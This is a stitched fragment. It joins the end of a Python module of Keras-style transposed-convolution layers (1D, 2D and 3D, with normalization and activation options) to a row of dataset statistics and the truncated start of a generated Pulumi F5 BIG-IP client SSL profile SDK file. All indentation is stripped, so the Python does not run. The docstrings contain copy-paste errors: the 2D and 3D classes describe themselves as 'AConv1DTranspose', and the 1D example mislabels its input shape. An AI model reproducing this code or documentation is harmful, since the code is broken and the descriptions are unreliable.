gamma_initializer = self.gamma_initializer,
gamma_regularizer = self.gamma_regularizer,
gamma_constraint = self.gamma_constraint,
beta_initializer = self.beta_initializer,
beta_regularizer = self.beta_regularizer,
beta_constraint = self.beta_constraint,
trainable=self.trainable)
elif self.normalization.casefold() == 'inst':
self.layer_norm = InstanceNormalization(axis=channel_axis,
gamma_initializer = self.gamma_initializer,
gamma_regularizer = self.gamma_regularizer,
gamma_constraint = self.gamma_constraint,
beta_initializer = self.beta_initializer,
beta_regularizer = self.beta_regularizer,
beta_constraint = self.beta_constraint,
trainable=self.trainable)
elif self.normalization.casefold() == 'group':
self.layer_norm = GroupNormalization(axis=channel_axis, groups=self.groups,
gamma_initializer = self.gamma_initializer,
gamma_regularizer = self.gamma_regularizer,
gamma_constraint = self.gamma_constraint,
beta_initializer = self.beta_initializer,
beta_regularizer = self.beta_regularizer,
beta_constraint = self.beta_constraint,
trainable=self.trainable)
self.layer_norm.build(next_shape)
compat.collect_properties(self, self.layer_norm) # for compatibility
next_shape = self.layer_norm.compute_output_shape(next_shape)
if self.high_activation == 'prelu':
shared_axes = tuple(range(1,self.rank+1))
self.layer_actv = PReLU(shared_axes=shared_axes)
self.layer_actv.build(next_shape)
compat.collect_properties(self, self.layer_actv) # for compatibility
elif self.high_activation == 'lrelu':
alpha = self.activity_config.get('alpha', 0.3)
self.layer_actv = LeakyReLU(alpha=alpha)
self.layer_actv.build(next_shape)
super(_AConvTranspose, self).build(input_shape)
def call(self, inputs):
if self.modenew: # Apply new architecture
outputs = self.layer_uppool(inputs)
if self.layer_padding is not None:
outputs = self.layer_padding(outputs)
outputs = self.layer_conv(outputs)
if self.layer_cropping is not None:
outputs = self.layer_cropping(outputs)
else: # Use classic method
if self.rank == 1:
inputs = array_ops.expand_dims(inputs, axis=1)
outputs = self.layer_deconv(inputs)
if self.rank == 1:
outputs = array_ops.squeeze(outputs, axis=1)
if self.normalization and (not self.use_bias):
outputs = self.layer_norm(outputs)
if self.high_activation in ('prelu', 'lrelu'):
outputs = self.layer_actv(outputs)
if self.use_plain_activation:
return self.activation(outputs) # pylint: disable=not-callable
return outputs
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
input_shape = input_shape.with_rank_at_least(self.rank + 2)
if self.modenew: # Apply new architecture
next_shape = self.layer_uppool.compute_output_shape(input_shape)
if self.layer_padding is not None:
next_shape = self.layer_padding.compute_output_shape(next_shape)
next_shape = self.layer_conv.compute_output_shape(next_shape)
if self.layer_cropping is not None:
next_shape = self.layer_cropping.compute_output_shape(next_shape)
else: # Use classic method
if self.rank == 1:
next_shape = input_shape[:1].concatenate([1,]).concatenate(input_shape[1:])
next_shape = self.layer_conv.compute_output_shape(next_shape)
if self.rank == 1:
next_shape = next_shape[:1].concatenate(next_shape[2:])
if not self.use_bias:
next_shape = self.layer_norm.compute_output_shape(next_shape)
if self.high_activation in ('prelu', 'lrelu'):
next_shape = self.layer_actv.compute_output_shape(next_shape)
return next_shape
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'lgroups': self.lgroups,
'padding': self.padding,
'output_mshape': self.output_mshape,
'output_padding': self.output_padding,
'output_cropping': self.output_cropping,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'normalization': self.normalization,
'beta_initializer': initializers.serialize(self.beta_initializer),
'gamma_initializer': initializers.serialize(self.gamma_initializer),
'beta_regularizer': regularizers.serialize(self.beta_regularizer),
'gamma_regularizer': regularizers.serialize(self.gamma_regularizer),
'beta_constraint': constraints.serialize(self.beta_constraint),
'gamma_constraint': constraints.serialize(self.gamma_constraint),
'groups': self.groups,
'activation': activations.serialize(self.activation),
'activity_config': self.activity_config,
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'_high_activation': self.high_activation
}
base_config = super(_AConvTranspose, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class AConv1DTranspose(_AConvTranspose):
"""Modern transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
The abstract architecture of AConv1DTranspose is:
`output = activation( normalization( convTranspose(x, W), gamma, beta ), alpha )`
This layer is a stack of transposed convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
filters: Integer, the dimensionality of the output space (i.e. the number
of filters in the convolution).
kernel_size: An integer or tuple/list of n integers, specifying the
length of the convolution window.
strides: An integer or tuple/list of n integers,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Only if set, use group
convolution. The latent filter number of group convolution would
be inferred by lfilters = filters // lgroups. Hence, filters should
be a multiple of lgroups.
padding: One of `"valid"`, `"same"`.
output_mshape: (Only avaliable for new-style API) An integer or tuple/list
of the desired output shape. When setting this option, `output_padding`
and `out_cropping` would be inferred from the input shape, which means
users' options would be invalid for the following two options.
A recommended method of using this method is applying such a scheme:
`AConv(..., output_mshape=tensor.get_shape())`
output_padding: An integer or tuple/list of n integers,
specifying the amount of padding along the height and width
of the output tensor.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be padded.
out_cropping: (Only avaliable for new-style API) An integer or tuple/list
of n integers, specifying the amount of cropping along the axes of the
output tensor. The amount of output cropping along a given dimension must
be lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be cropped.
data_format: A string, only support `channels_last` here:
`channels_last` corresponds to inputs with shape
`(batch, steps channels)`
dilation_rate: An integer or tuple/list of n integers, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
kernel_initializer: An initializer for the convolution kernel.
kernel_regularizer: Optional regularizer for the convolution kernel.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
3D tensor with shape: `(batch_size, steps, input_dim)`
Output shape:
3D tensor with shape: `(batch_size, new_steps, filters)`
`steps` value might have changed due to padding or strides.
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self, filters,
kernel_size,
strides=1,
lgroups=None,
padding='valid',
output_mshape=None,
output_padding=None,
output_cropping=None,
data_format=None,
dilation_rate=1,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv1DTranspose, self).__init__(
rank=1,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
output_mshape=output_mshape,
output_padding=output_padding,
output_cropping=output_cropping,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
class AConv2DTranspose(_AConvTranspose):
"""Modern transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
The abstract architecture of AConv1DTranspose is:
`output = activation( normalization( convTranspose(x, W), gamma, beta ), alpha )`
This layer is a stack of transposed convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
height and width of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the height and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Only if set, use group
convolution. The latent filter number of group convolution would
be inferred by lfilters = filters // lgroups. Hence, filters should
be a multiple of lgroups.
padding: one of `"valid"` or `"same"` (case-insensitive).
output_mshape: (Only avaliable for new-style API) An integer or tuple/list
of the desired output shape. When setting this option, `output_padding`
and `out_cropping` would be inferred from the input shape, which means
users' options would be invalid for the following two options.
A recommended method of using this method is applying such a scheme:
`AConv(..., output_mshape=tensor.get_shape())`
output_padding: An integer or tuple/list of 2 integers,
specifying the amount of padding along the height and width
of the output tensor.
Can be a single integer to specify the same value for all
spatial dimensions.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be padded.
out_cropping: (Only avaliable for new-style API) An integer or tuple/list
of n integers, specifying the amount of cropping along the axes of the
output tensor. The amount of output cropping along a given dimension must
be lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be cropped.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
kernel_initializer: An initializer for the convolution kernel.
kernel_regularizer: Optional regularizer for the convolution kernel.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
4D tensor with shape:
`(batch, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(batch, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self, filters,
kernel_size,
strides=(1, 1),
lgroups=None,
padding='valid',
output_mshape=None,
output_padding=None,
output_cropping=None,
data_format=None,
dilation_rate=(1, 1),
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv2DTranspose, self).__init__(
rank=2,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
output_mshape=output_mshape,
output_padding=output_padding,
output_cropping=output_cropping,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
class AConv3DTranspose(_AConvTranspose):
"""Modern transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 3)` for a 128x128x128 volume with 3 channels
if `data_format="channels_last"`.
The abstract architecture of AConv1DTranspose is:
`output = activation( normalization( convTranspose(x, W), gamma, beta ), alpha )`
This layer is a stack of transposed convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 3 integers, specifying the
depth, height and width of the 3D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 3 integers,
specifying the strides of the convolution along the depth, height
and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Only if set, use group
convolution. The latent filter number of group convolution would
be inferred by lfilters = filters // lgroups. Hence, filters should
be a multiple of lgroups.
padding: one of `"valid"` or `"same"` (case-insensitive).
output_mshape: (Only avaliable for new-style API) An integer or tuple/list
of the desired output shape. When setting this option, `output_padding`
and `out_cropping` would be inferred from the input shape, which means
users' options would be invalid for the following two options.
A recommended method of using this method is applying such a scheme:
`AConv(..., output_mshape=tensor.get_shape())`
output_padding: An integer or tuple/list of 3 integers,
specifying the amount of padding along the depth, height, and
width.
Can be a single integer to specify the same value for all
spatial dimensions.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape is inferred.
out_cropping: (Only avaliable for new-style API) An integer or tuple/list
of n integers, specifying the amount of cropping along the axes of the
output tensor. The amount of output cropping along a given dimension must
be lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be cropped.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, depth, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, depth, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 3 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
kernel_initializer: An initializer for the convolution kernel.
kernel_regularizer: Optional regularizer for the convolution kernel.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
5D tensor with shape:
`(batch, channels, depth, rows, cols)` if data_format='channels_first'
or 5D tensor with shape:
`(batch, depth, rows, cols, channels)` if data_format='channels_last'.
Output shape:
5D tensor with shape:
`(batch, filters, new_depth, new_rows, new_cols)` if
data_format='channels_first'
or 5D tensor with shape:
`(batch, new_depth, new_rows, new_cols, filters)` if
data_format='channels_last'.
`depth` and `rows` and `cols` values might have changed due to padding.
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self, filters,
kernel_size,
strides=(1, 1, 1),
lgroups=None,
padding='valid',
output_mshape=None,
output_padding=None,
output_cropping=None,
data_format=None,
dilation_rate=(1, 1, 1),
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv3DTranspose, self).__init__(
rank=3,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
output_mshape=output_mshape,
output_padding=output_padding,
output_cropping=output_cropping,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
| 52.583722 | 218 | 0.617047 | 17,747 | 157,646 | 5.339043 | 0.037415 | 0.017731 | 0.011778 | 0.008612 | 0.92359 | 0.908171 | 0.894387 | 0.883939 | 0.872393 | 0.862779 | 0 | 0.009603 | 0.313671 | 157,646 | 2,997 | 219 | 52.601268 | 0.866133 | 0.467015 | 0 | 0.846595 | 0 | 0.00191 | 0.043037 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024188 | false | 0 | 0.011458 | 0.000637 | 0.059198 | 0.000637 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8dec55a1f72b1da133190026bbcee307806a9b92 | 140,736 | py | Python | sdk/python/pulumi_f5bigip/ltm/profile_client_ssl.py | pulumi/pulumi-f5bigip | 4bce074f8bd7cb42f359ef4814ca5b437230fd1c | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2018-12-21T23:30:33.000Z | 2021-10-12T16:38:27.000Z | sdk/python/pulumi_f5bigip/ltm/profile_client_ssl.py | pulumi/pulumi-f5bigip | 4bce074f8bd7cb42f359ef4814ca5b437230fd1c | [
"ECL-2.0",
"Apache-2.0"
] | 61 | 2019-01-09T01:50:19.000Z | 2022-03-31T15:27:17.000Z | sdk/python/pulumi_f5bigip/ltm/profile_client_ssl.py | pulumi/pulumi-f5bigip | 4bce074f8bd7cb42f359ef4814ca5b437230fd1c | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2019-10-05T10:36:30.000Z | 2019-10-05T10:36:30.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ProfileClientSslArgs', 'ProfileClientSsl']
@pulumi.input_type
class ProfileClientSslArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
alert_timeout: Optional[pulumi.Input[str]] = None,
allow_non_ssl: Optional[pulumi.Input[str]] = None,
authenticate: Optional[pulumi.Input[str]] = None,
authenticate_depth: Optional[pulumi.Input[int]] = None,
c3d_client_fallback_cert: Optional[pulumi.Input[str]] = None,
c3d_drop_unknown_ocsp_status: Optional[pulumi.Input[str]] = None,
c3d_ocsp: Optional[pulumi.Input[str]] = None,
ca_file: Optional[pulumi.Input[str]] = None,
cache_size: Optional[pulumi.Input[int]] = None,
cache_timeout: Optional[pulumi.Input[int]] = None,
cert: Optional[pulumi.Input[str]] = None,
cert_extension_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cert_key_chains: Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]] = None,
cert_life_span: Optional[pulumi.Input[int]] = None,
cert_lookup_by_ipaddr_port: Optional[pulumi.Input[str]] = None,
chain: Optional[pulumi.Input[str]] = None,
ciphers: Optional[pulumi.Input[str]] = None,
client_cert_ca: Optional[pulumi.Input[str]] = None,
crl_file: Optional[pulumi.Input[str]] = None,
defaults_from: Optional[pulumi.Input[str]] = None,
forward_proxy_bypass_default_action: Optional[pulumi.Input[str]] = None,
full_path: Optional[pulumi.Input[str]] = None,
generation: Optional[pulumi.Input[int]] = None,
generic_alert: Optional[pulumi.Input[str]] = None,
handshake_timeout: Optional[pulumi.Input[str]] = None,
inherit_cert_keychain: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
mod_ssl_methods: Optional[pulumi.Input[str]] = None,
mode: Optional[pulumi.Input[str]] = None,
partition: Optional[pulumi.Input[str]] = None,
passphrase: Optional[pulumi.Input[str]] = None,
peer_cert_mode: Optional[pulumi.Input[str]] = None,
proxy_ca_cert: Optional[pulumi.Input[str]] = None,
proxy_ca_key: Optional[pulumi.Input[str]] = None,
proxy_ca_passphrase: Optional[pulumi.Input[str]] = None,
proxy_ssl: Optional[pulumi.Input[str]] = None,
proxy_ssl_passthrough: Optional[pulumi.Input[str]] = None,
renegotiate_period: Optional[pulumi.Input[str]] = None,
renegotiate_size: Optional[pulumi.Input[str]] = None,
renegotiation: Optional[pulumi.Input[str]] = None,
retain_certificate: Optional[pulumi.Input[str]] = None,
secure_renegotiation: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
session_mirroring: Optional[pulumi.Input[str]] = None,
session_ticket: Optional[pulumi.Input[str]] = None,
sni_default: Optional[pulumi.Input[str]] = None,
sni_require: Optional[pulumi.Input[str]] = None,
ssl_c3d: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy_bypass: Optional[pulumi.Input[str]] = None,
ssl_sign_hash: Optional[pulumi.Input[str]] = None,
strict_resume: Optional[pulumi.Input[str]] = None,
tm_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
unclean_shutdown: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ProfileClientSsl resource.
:param pulumi.Input[str] name: Specifies the name of the profile.Name of Profile should be full path.The full path is the combination of the `partition + profile name`,For example `/Common/test-clientssl-profile`.
:param pulumi.Input[str] alert_timeout: Alert time out
:param pulumi.Input[str] allow_non_ssl: Enables or disables acceptance of non-SSL connections, When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] authenticate: Specifies the frequency of client authentication for an SSL session.When `once`,specifies that the system authenticates the client once for an SSL session.
When `always`, specifies that the system authenticates the client once for an SSL session and also upon reuse of that session.
:param pulumi.Input[int] authenticate_depth: Specifies the maximum number of certificates to be traversed in a client certificate chain
:param pulumi.Input[str] c3d_client_fallback_cert: Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
:param pulumi.Input[str] c3d_drop_unknown_ocsp_status: Specifies the BIG-IP action when the OCSP responder returns unknown status. The default value is drop, which causes the onnection to be dropped. Conversely, you can specify ignore, which causes the connection to ignore the unknown status and continue.
:param pulumi.Input[str] c3d_ocsp: Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
:param pulumi.Input[str] ca_file: Client certificate file path. Default None.
:param pulumi.Input[int] cache_size: Cache size (sessions).
:param pulumi.Input[int] cache_timeout: Cache time out
:param pulumi.Input[str] cert: Specifies a cert name for use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cert_extension_includes: Cert extension includes for ssl forward proxy
:param pulumi.Input[int] cert_life_span: Life span of the certificate in days for ssl forward proxy
:param pulumi.Input[str] cert_lookup_by_ipaddr_port: Cert lookup by ip address and port enabled / disabled
:param pulumi.Input[str] chain: Contains a certificate chain that is relevant to the certificate and key mentioned earlier.This key is optional
:param pulumi.Input[str] ciphers: Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
:param pulumi.Input[str] client_cert_ca: client certificate name
:param pulumi.Input[str] crl_file: Certificate revocation file name
:param pulumi.Input[str] defaults_from: Parent profile for this clientssl profile.Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It Should Full path `/partition/profile_name`
:param pulumi.Input[str] forward_proxy_bypass_default_action: Forward proxy bypass default action. (enabled / disabled)
:param pulumi.Input[str] full_path: full path of the profile
:param pulumi.Input[int] generation: generation
:param pulumi.Input[str] generic_alert: Generic alerts enabled / disabled.
:param pulumi.Input[str] handshake_timeout: Handshake time out (seconds)
:param pulumi.Input[str] inherit_cert_keychain: Inherit cert key chain
:param pulumi.Input[str] key: Contains a key name
:param pulumi.Input[str] mod_ssl_methods: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] mode: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] partition: name of partition
:param pulumi.Input[str] passphrase: Client Certificate Constrained Delegation CA passphrase
:param pulumi.Input[str] peer_cert_mode: Specifies the way the system handles client certificates.When ignore, specifies that the system ignores certificates from client systems.When require, specifies that the system requires a client to present a valid certificate.When request, specifies that the system requests a valid certificate from a client but always authenticate the client.
:param pulumi.Input[str] proxy_ca_cert: Proxy CA Cert
:param pulumi.Input[str] proxy_ca_key: Proxy CA Key
:param pulumi.Input[str] proxy_ca_passphrase: Proxy CA Passphrase
:param pulumi.Input[str] proxy_ssl: Proxy SSL enabled / disabled. Default is disabled.
